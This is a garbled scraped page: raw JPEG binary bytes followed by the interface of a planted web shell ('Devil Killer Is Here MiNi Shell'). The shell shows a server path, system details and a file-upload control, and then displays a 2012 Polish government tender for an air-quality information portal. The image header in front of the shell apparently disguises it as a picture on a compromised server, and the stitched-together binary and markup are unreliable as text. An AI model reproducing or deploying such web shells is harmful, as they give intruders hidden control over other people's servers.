JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120209/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120209/39842-N-2012.html

<p class="kh_header"><b>Warszawa: Opracowanie i wdrażanie serwisu internetowego w zakresie informacji o jakości powietrza w Polsce oraz działań na rzecz jego poprawy</b><br>
<b>Numer ogłoszenia: 39842 - 2012; data zamieszczenia: 09.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Główny Inspektorat Ochrony Środowiska , ul. Wawelska 52/54, 00-922 Warszawa, woj. mazowieckie, tel. 022 8256376, 8258457, faks 022 8256376, 8254129.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gios.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie i wdrażanie serwisu internetowego w zakresie informacji o jakości powietrza w Polsce oraz działań na rzecz jego poprawy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Cel pracy
Celem przedsięwzięcia jest przygotowanie elektronicznej informacji na temat jakości powietrza w Polsce oraz działań na rzecz jego poprawy, przy pomocy portalu  internetowego. Portal  ten będzie jednocześnie wypełnieniem zobowiązania zapisanego w projekcie ustawy o zmianie ustawy - Prawo ochrony środowiska oraz niektórych innych ustaw, który wprowadza do ustawy - Prawo ochrony środowiska  art. 92b.1. w brzmieniu: Informacje o stanie jakości powietrza, w tym lokalizacji wszystkich stref na terenie kraju, w których dokonuje się oceny jakości powietrza i jego stanu, udostępniane są na stronie internetowej Głównego Inspektoratu Ochrony Środowiska. Na stronie udostępnia się również informacje o decyzjach odraczających i zwolnieniach, o programach ochrony powietrza oraz planach działań krótkoterminowych. Projekt ustawy został przyjęty przez Radę Ministrów w dniu 20 grudnia 2011 r.
Celem udostępnianych na portalu internetowym informacji będzie rozpowszechnienie wśród społeczeństwa wiedzy na temat stanu zanieczyszczenia powietrza w Polsce oraz najistotniejszych problemów związanych z zapewnieniem odpowiedniej jego jakości. Ponadto, poprzez prezentację informacji o jakości powietrza w Polsce oraz planach i programach ochrony powietrza portal ten zapewni decydentom wsparcie w procesie zarządzania jakością powietrza w Polsce. 
1.	Zakres pracy
Zakres przedsięwzięcia będzie obejmować zadania realizowane w dwóch kolejnych etapach.

 2.1. ETAP I - termin realizacji: do 10 maja 2012 r.

Opracowanie projektu architektury aplikacji informatycznej, zakresu funkcjonalności, struktury logicznej i merytorycznej oraz siatki połączeń pomiędzy elementami struktury, zasad nawigacji oraz projektu graficznego.
 
Przy opracowywaniu projektu portalu internetowego należy wziąć pod uwagę następujące minimalne wymagania merytoryczne i techniczne:
1)	portal będzie zainstalowany na serwerze GIOŚ;
2)	treści prezentowane na portalu powinny być dostępne przy wykorzystaniu popularnych przeglądarek internetowych, bez względu na system operacyjny, na którym zostały one uruchomione. Portal powinien także umożliwiać prezentację plików o dowolnym formacie, standardowo wykorzystywanych na stronach internetowych (np. dokumenty tekstowe, grafika, animacja flash, video, zdjęcia, arkusz kalkulacyjny), serwis powinien wykorzystywać elementy technologii Ajax umożliwiając odświeżanie pewnych komponentów (wykresy, mapy itp.) bez przeładowania strony.
3)	portal powinien być w dużej mierze oparty o techniki GIS (warstwy - dane przestrzenne), informacje powinny być dostępne po wybraniu odpowiedniej opcji poprzez mapę stref (np. po wybraniu opcji - wyniki oceny jakości powietrza dla wybranego roku  powinna się wyświetlać mapa ze strefami zaznaczonymi odpowiednio (strefy C zaznaczone kolorem czerwonym, A zielonym) po kliknięciu na daną strefę powinna się ukazywać informacja o obszarach przekroczeń i ludności narażonej, obowiązujących programach ochrony powietrza, planach działań krótkoterminowych, odroczeniach z art. 22 dyrektywy 2008/50/WE) podobnie w odniesieniu do innych informacji  np. stanowisk pomiarowych dla wskaźnika średniego narażenia, planów działań krótkoterminowych, programów ochrony powietrza (po kliknięciu na daną strefę powinny się wyświetlić linki do działań krótkoterminowych lub programów ochrony powietrza (odpowiednio));
4)	portal powinien umożliwiać: przeglądanie informacji, wyszukiwanie, drukowanie, pobieranie wybranych materiałów (pliki o różnym formacie), dostęp do wybranych danych źródłowych i dawać możliwość ich pobrania; 
5)	mechanizm wyszukiwania informacji musi posiadać funkcję wyszukiwania pełnotekstowego we wszystkich prezentowanych informacjach zawartych w bazie obsługującej portal
6)	należy zapewnić możliwość generowania raportów ilościowych i jakościowych (liczba odwiedzin portalu, pobieranie materiałów);
7)	portal powinien być skonstruowany tak, by możliwy był jego rozwój i wzbogacenie o nowe funkcjonalności w przyszłości;
8)	należy umożliwić redagowanie i aktualizowanie treści prezentowanych na portalu przez pracowników GIOŚ nie będących informatykami, w związku z tym aplikacja  powinna umożliwiać łatwe wprowadzanie lub modyfikowanie treści i danych prezentowanych na portalu oraz umieszczenie plików;
9)	projekt portalu powinien zostać przygotowany w oparciu o analizę informacji na temat jakości powietrza, w tym prawodawstwa krajowego i UE odnoszącego się do tej tematyki, analizę systemu pomiarów i ocen (rocznych i pięcioletnich) jakości powietrza,  programów i planów jakości powietrza, strategii i innych dokumentów związanych z zarządzaniem jakością powietrza;
10)	prezentowany na portalu materiał powinien zawierać odnośniki (linki) do materiałów źródłowych przywołanych na stronie, których przywołanie wzbogaciłoby ich treść;
11)	ustalając zakres i formę prezentacji informacji na portalu należy wziąć pod uwagę jej czytelność i sprawne funkcjonowanie;
12)	z portalu powinien być dostęp do archiwalnych wyników pomiarów stężeń zanieczyszczeń - zbiory AIRBASE - poprzez warstwę stacji pomiarowych - po wybraniu stacji - powinna być możliwość uzyskania danych dla danego roku i danego zanieczyszczenia oraz wyboru formatu pliku do eksportu;
13)	portal powinien zawierać:
a)	informacje na temat polskiego i unijnego prawodawstwa mającego związek z problematyką monitoringu i oceny jakości powietrza i działaniami na rzecz jego poprawy wraz z prezentacją treści tych aktów prawnych;
b)	informacje na temat wszystkich norm jakości powietrza określonych w prawodawstwie polskim i dyrektywach 2008/50/WE i 2004/107/WE;
c)	informacje na temat dokumentów strategicznych mających związek z ochroną powietrza wraz z dostępem do nich;
d)	informacje na temat wszystkich uchwalonych programów ochrony powietrza oraz planów działań krótkoterminowych oraz linki do tych planów i programów z możliwością ich przeglądania, programy powinny być prezentowane w podziale na województwa i strefy; informacje te powinny być dostępne poprzez mapę stref (podział na strefy wykorzystany w ocenie za 2010 r.) oraz w postaci wykazów;
e)	informacje na temat derogacji i odroczeń dla stref przyznanych przez KE oraz ich treść;
f)	krajowe raporty z corocznej klasyfikacji stref, raporty prezentujące wybrane problemy zanieczyszczenia powietrza w Polsce, krajowe raporty z oceny pięcioletniej oraz linki do rocznych i pięcioletnich ocen jakości powietrza wykonywanych przez wojewódzkich inspektorów ochrony środowiska;
g)	mapy prezentujące podział kraju na strefy, w których oceniana była jakość powietrza w latach 2004-2009 oraz podział wprowadzany w ocenie za 2010 rok. Dla stref w których oceniana była jakość powietrza w latach 2004-2009 poprzez kliknięcie na mapie stref powinna być możliwość uzyskania informacji o wynikach ocen rocznych dla poszczególnych lat i poszczególnych zanieczyszczeń. Dla stref wprowadzonych w ocenie za 2010 rok (46 stref) poprzez kliknięcie na mapie stref powinna być dostępna dla każdej ze stref krótka charakterystyka strefy, w tym informacje demograficzne, topograficzne, infrastrukturalne, klimatyczne, charakterystykę głównych gałęzi przemysłu, itp. Poprzez mapę stref (podział na strefy wykorzystany w ocenie za 2010 r.) powinna być również możliwość uzyskania informacji o wynikach ocen (rocznej, pięcioletniej) jakości powietrza, systemie pomiarów jakości powietrza, wynikach pomiarów jakości powietrza, planach działań krótkoterminowych i programach ochrony powietrza (o których mowa w pkt 13d), derogacjach UE (o których mowa w pkt 13e) oraz innych  istotnych informacjach mającymi związek z oceną/zarządzaniem jakością powietrza w danej strefie (osobno dla każdej kategorii informacji). Z dniem podpisania umowy Zamawiający przekaże Wykonawcy szczegółowe informacje na temat nowego podziału kraju na strefy. Informacje dotyczące stref powinny być również dostępne w postaci wykazu; 
h)	informacje na temat krajowego celu redukcji narażenia na pył PM2,5 oraz krajowego wskaźnika średniego narażenia, wskaźnika średniego narażenia dla aglomeracji i miast powyżej 100 000 mieszkańców wraz z informacjami na temat wielkości tych wskaźników oraz lokalizacji punktów pomiarowych, z których wyniki są wykorzystywane do ich obliczania. Informacje te powinny być dostępne poprzez wykazy informacji oraz poprzez mapę prezentującą lokalizację 32 punktów pomiarowych  wraz z ich krótką charakterystyką i wartościami wskaźnika średniego narażenia dla poszczególnych miast i aglomeracji w kolejnych latach poczynając od roku 2010, dla aglomeracji górnośląskiej i warszawskiej średni wskaźnik dla dwóch stanowisk oraz wyniki pomiarów (średnie roczne dla stanowiska). W terminie 14 dni roboczych od dnia podpisania umowy Zamawiający przekaże Wykonawcy dane na temat lokalizacji stanowisk pomiarowych, na których prowadzone są pomiary pyłu PM2,5 na podstawie których, określany jest krajowy cel redukcji narażenia oraz wartości wskaźników średniego narażenia dla aglomeracji i miast powyżej 100 000 mieszkańców za rok 2010 i wartość krajowego wskaźnika średniego narażenia. możliwość prezentowania opracowań i raportów na temat zanieczyszczenia powietrza pyłem PM2,5 na stacjach prowadzących pomiary dla potrzeb wyznaczenia krajowego wskaźnika średniego narażenia. 
i)	informacje na temat systemu monitoringu jakości powietrza, w tym: ogólny opis funkcjonowania systemu pomiarów jakości powietrza, możliwość prezentacji - poprzez znaczniki na mapie - lokalizacji stanowisk/stacji pomiarowych wszystkich zanieczyszczeń o których mowa w dyrektywach 2008/50/WE i 2004/107/WE wraz z możliwością uzyskania informacji o typie stanowiska/stacji, współrzędnych położenia, metodach pomiaru, umieszczenia jej zdjęcia, oraz docelowo możliwością uzyskania (prezentacji) danych pomiarowych z tego stanowiska w sposób dynamiczny. W terminie 14 dni roboczych od dnia podpisania umowy Zamawiający przekaże Wykonawcy dane na temat stanowisk/stacji pomiarowych funkcjonujących w 2011 r. w Polsce; Informacje dotyczące lokalizacji stanowisk/stacji pomiarowych wraz z możliwością uzyskania informacji o typie stanowiska/stacji, współrzędnych położenia  powinny być również dostępne w postaci wykazu. 
j)	możliwość prezentowania informacji typu Zanieczyszczenie powietrza - aktualności, gdzie ukazywałyby się na bieżąco aktualności z tego zakresu, wpisywane przez administratora portalu lub generowane automatycznie z bazy JPOAT2.0 (model docelowy);  
k)	linki do stron WIOŚ na których on-line są prezentowane wyniki pomiarów jakości powietrza;  
l)	informacje na temat przekroczeń poziomów alarmowych i progu informowania, informacje te w sposób dynamiczny powinny być pobierane z bazy PA2 zainstalowanej na serwerze GIOŚ (opartej na systemie MySQL); Zamawiający udostępni informacje na temat struktury i zawartości bazy PA2. Szczegółowy sposób pobierania danych z bazy PA2 zostanie uzgodniony z Wykonawcą na etapie wykonywania zamówienia. 
m)	informacje na temat zanieczyszczenia powietrza na tłowych stacjach EMEP, w tym  opis tego programu, raporty podsumowujące badania z poszczególnych lat, link do strony internetowej Konwencji o transgranicznym zanieczyszczaniu powietrza na dalekie odległości oraz wyniki pomiarów z poszczególnych stacji EMEP dla  poszczególnych lat dostępne dynamicznie poprzez mapę Polski po wybraniu stacji pomiarowej, z możliwością uzyskania informacji o stacji, współrzędnych położenia, metodach pomiaru, umieszczenia jej zdjęcia, oraz docelowo możliwością uzyskania (prezentacji) danych pomiarowych z tego stanowiska dla poszczególnych lat i zanieczyszczeń w sposób dynamiczny. Dane te powinny być również dostępne w  postaci wykazu z możliwością wyboru formatu pliku do eksportu. W terminie 14 dni roboczych od dnia podpisania umowy Zamawiający przekaże Wykonawcy dane na temat lokalizacji stacji EMEP w Polsce (4 stacje);
n)	informacje na temat chemizmu opadów atmosferycznych, w tym  opis tego programu, mapy rozkładu stężeń i rozkładu ładunków poszczególnych zanieczyszczeń zawartych w opadach atmosferycznych, wyniki pomiarów stężeń i ładunków z poszczególnych stanowisk pomiarowych z poszczególnych lat dostępne dynamicznie poprzez mapę Polski po wybraniu stanowiska pomiarowego, a następnie roku i zanieczyszczenia, Dane te powinny być również dostępne w  postaci wykazu z możliwością wyboru formatu pliku do eksportu. W terminie 14 dni roboczych od dnia podpisania umowy Zamawiający przekaże Wykonawcy dane na temat lokalizacji stanowisk pomiarowych, na których prowadzone są pomiary chemizmu opadów atmosferycznych (25 stanowisk); 
o)	informacje na temat wyników wspomagania rocznej oceny jakości powietrza metodami modelowania matematycznego zarówno na poziomie krajowym jak i wojewódzkim (w przypadku informacji wojewódzkiej wystarczą linki do stron WIOŚ prezentujących wyniki modelowania dla potrzeb oceny jakości powietrza) w przypadku poziomu krajowego informacje te muszą być zamieszczane na portalu przez jej administratora, w tym portal powinien zapewniać możliwość publikowania wyników modelowania w postaci warstw mapy cyfrowej;
p)	możliwość prezentowania prognoz krótko- i długoterminowych jakości powietrza;
q)	informacje na temat działalności Krajowego Laboratorium Referencyjnego i Wzorcującego;
r)	linki do stron na których są udostępniane informacje z projektów Ozoneweb i MACC oraz do stron Europejskiej Agencji Środowiska, na których prezentowane są informacje na temat jakości powietrza;

14)	informacje o których mowa w podpunktach d, g, h, i, m, n, o powinny być prezentowane w sposób, o którym mowa w pkt 3 w oparciu o techniki GIS (warstwy - dane przestrzenne), informacje powinny być dostępne po wybraniu odpowiedniej opcji poprzez mapę stref dla Polski;
15)	mapy, które posłużą do prezentowania informacji, o których mowa w pkt 13, zostaną wytworzone przez Wykonawcę.
Wykonawca w terminie do 13 kwietnia 2012 r. przedstawi Zamawiającemu trzy projekty graficzne portalu internetowego, z których Zamawiający wybierze jeden odpowiadający mu projekt graficzny. Projekty graficzne portalu internetowego będą przedłożone Zamawiającemu w postaci prezentacji zawierającej propozycje wyglądu poszczególnych elementów portalu. Prezentacja trzech projektów graficznych portalu internetowego powinna być złożona na płycie CD (w formacie dającym się odczytać za pomocą MS PowerPoint).
2.2. ETAP II - termin realizacji: do 31 października 2012 r.

Przygotowanie aplikacji informatycznej - w oparciu o zaakceptowany przez GIOŚ projekt wykonany w ramach etapu I. 

Wykonawca zobowiązuje się do wykonania portalu, zgodnie z zaakceptowanym przez Zamawiającego projektem i z uwzględnieniem wymagań określonych w punkcie 2.1. oraz następujących parametrów i wytycznych:
1)	składniki portalu muszą być dostosowane do większości popularnych przeglądarek internetowych, w tym muszą prawidłowo obsługiwać przeglądarki m. in. takie jak: Mozilla Firefox i Internet Explorer;
2)	wersja językowa portalu internetowego - wersja polska, z możliwością rozszerzenia o kolejną wersję językową;
3)	portal powinien umożliwiać zarządzanie treścią za pomocą czytelnego menu graficznego;
4)	jeżeli Wykonawca użyje w procesie tworzenia portalu komponentów firm trzecich, dostarczy Zamawiającemu licencje na ich użytkowanie, wykorzystywanie tych komponentów nie może powodować kosztów dodatkowych po stronie Zamawiającego.
Portal internetowy  będzie zawierał informacje, o których mowa w punkcie 2.1. etap I. Informacje, o których mowa w punktach 13a, 13b, 13c, 13d, 13e, 13f, 13j, 13k, 13l, 13m, 13n, 13o, 13p, 13q, 13r zostaną przekazane Wykonawcy przez Zamawiającego w terminie do 30 marca 2012 r. Ponadto Zamawiający do dnia 30 marca 2012 r. przekaże Wykonawcy:
- 	informacje na temat systemu monitoringu jakości powietrza;
- 	dane na temat wyników ocen rocznych dla poszczególnych lat i poszczególnych zanieczyszczeń;
-	krótką charakterystykę każdej strefy, w tym informacje demograficzne, topograficzne, infrastrukturalne, klimatyczne, charakterystykę głównych gałęzi przemysłu, itp.; 
-    krótką charakterystyka każdego stanowiska pomiarowego dla wskaźnika średniego narażenia. 
Wykonawca przedstawi Zamawiającemu projekty stron, na których prezentowane będą informacje, o których mowa w punktach 13d, 13g, 13h, 13i, 13m, 13n w terminie do 20 lipca 2012 r., Zamawiający jest zobowiązany do wstępnego zaakceptowania przedłożonych przez Wykonawcę części pracy lub zgłoszenia uwag w terminie do 31 lipca 2012 r. W przypadku zgłoszenia przez Zamawiającego uwag do przedstawionych projektów Wykonawca jest zobowiązany do ich uwzględnienia zgodnie z zapisami niniejszego SIWZ. Wykonawca przedstawi projekt portalu internetowego wraz z jego zawartością Zamawiającemu w terminie do 31 sierpnia 2012 r. Zamawiający może zgłosić uwagi do projektu w terminie do 12 września 2012 r. Po uzyskaniu akceptacji formy, zawartości merytorycznej portalu oraz jego zgodności technologicznej ze środowiskiem Zamawiającego, Wykonawca przekaże Zamawiającemu: kody źródłowe, instrukcję instalacji, instrukcję kompilacji, przygotowane pakiety instalacyjne oraz w przypadku konieczności będzie uczestniczył w procesie instalacji portalu internetowego w siedzibie GIOŚ na wskazanych serwerach. Portal internetowy powinien zostać zainstalowany na serwerach GIOŚ w terminie do 5 października 2012 r. Po zainstalowaniu portalu internetowego w siedzibie GIOŚ Wykonawca w terminie do 12 października 2012 r. przeprowadzi szkolenie dla pracownika lub pracowników GIOŚ w zakresie obsługi i administrowania portalem będącym przedmiotem zamówienia.  Wykonawca 5 dni przed planowanym szkoleniem przekaże Zamawiającemu projekt Instrukcji obsługi portalu. Instrukcja obsługi portalu musi uwzględniać m. in. szczegółowe opisy czynności związanych z aktualizacją informacji udostępnianych na portalu. Zamawiający przetestuje działanie portalu i w terminie do 19 października 2012 r. zgłosi ewentualne uwagi co do jego funkcjonowania. W przypadku zgłoszenia przez Zamawiającego uwag Wykonawca jest zobowiązany do ich uwzględnienia zgodnie z zapisami niniejszego SIWZ.  
W terminie do 31 października 2012 r. Wykonawca przedłoży do odbioru portal internetowy zainstalowany na serwerze GIOŚ i dostępny z głównej  strony WWW GIOŚ,  spełniający wszystkie wymagania określone w SIWZ wraz z instrukcją jego obsługi i informacją o przeszkoleniu pracownika lub pracowników GIOŚ w zakresie obsługi i administrowania portalem będącym przedmiotem zamówienia.

Wykonawca zapewni bezpłatny serwis i pomoc typu helpdesk do 31 marca 2013 r.
Poprzez bezpłatny serwis i pomoc typu helpdesk należy rozumieć: 
1) 	usuwanie wszelkich błędów technicznych zidentyfikowanych w trakcie użytkowania portalu internetowego;
2) 	przywracanie portalu internetowego do pełnej sprawności po ewentualnych błędach popełnionych podczas bieżącego administrowania portalem;
3) 	przywracanie portalu do pełnej operacyjności po ewentualnych atakach hackingowych i innych formach zewnętrznej interwencji w kodzie źródłowym i funkcjonalność portalu internetowego;
4) 	udzielanie konsultacji administratorowi portalu internetowego, w tym pomoc w publikacji danych, plików.
Czas reakcji Wykonawcy na zgłoszenie Zamawiającego nie może przekraczać 1 dnia roboczego od dnia zgłoszenia problemów przez Zamawiającego.
Wykonawca usunie problemy, o których mowa w pkt 1, 2 i 3  w terminie 7 dni od dnia ich zgłoszenia przez Zamawiającego.
Wymagania technologiczne:
Technologia wykonania portalu zgodna ze standardem JEE (Java Enterprise Edition)
1) Baza danych do obsługi portalu - Oracle DB 11 g z opcją RAC;
2) Serwer aplikacji - Weblogic 10.3.5;
3) Serwer GIS - ARC SDE 9.0., Zamawiający dopuszcza rozwiązanie OPEN SOURCE w zakresie GIS.
Zgodność rozwiązań technologicznych z wymaganiami musi być zatwierdzona przez Zamawiającego.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 72.41.30.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania warunku - Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania - wykonawca ma obowiązek złożyć:
1)	wypełnione  i podpisane oświadczenie o braku podstaw do wykluczenia z postępowania, którego wzór stanowi załącznik nr 1 do SIWZ. Jeżeli Wykonawcy wspólnie ubiegają się o udzielenie zamówienia dokument ten składa każdy z nich;
2)	aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 uPzp,  wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 uPzp.  Jeżeli Wykonawcy wspólnie ubiegają się o udzielenie zamówienia dokument ten składa każdy z nich;
3)	wypełnione i podpisane oświadczenie o spełnianiu warunków udziału w postępowaniu, którego wzór stanowi załącznik nr 2 do SIWZ.  Jeżeli Wykonawcy wspólnie ubiegają się o udzielenie zamówienia dokument ten mogą złożyć łącznie;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz wykonanych usług, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych minimum 3 prac na łączną kwotę nie mniejszą niż 70 000  zł, w tym dwóch prac, których przedmiotem było wykonanie serwisu internetowego, w tym co najmniej jednego serwisu internetowego opartego na systemach informacji przestrzennej  i jednej pracy, w ramach której wykonana została analiza lub ocena zanieczyszczenia powietrza atmosferycznego o zasięgu ponad wojewódzkim, wykonanych w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, terminów wykonania i odbiorców, sporządzony według wzoru stanowiącego załącznik nr 3 do SIWZ oraz dokumenty wystawione przez odbiorców, że usługi te zostały wykonane lub są wykonywane należycie. Jeżeli Wykonawcy wspólnie ubiegają się o udzielenie zamówienia dokument ten składa przynajmniej ten lub ci Wykonawcy, którzy potwierdzają spełnienie tego warunku;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
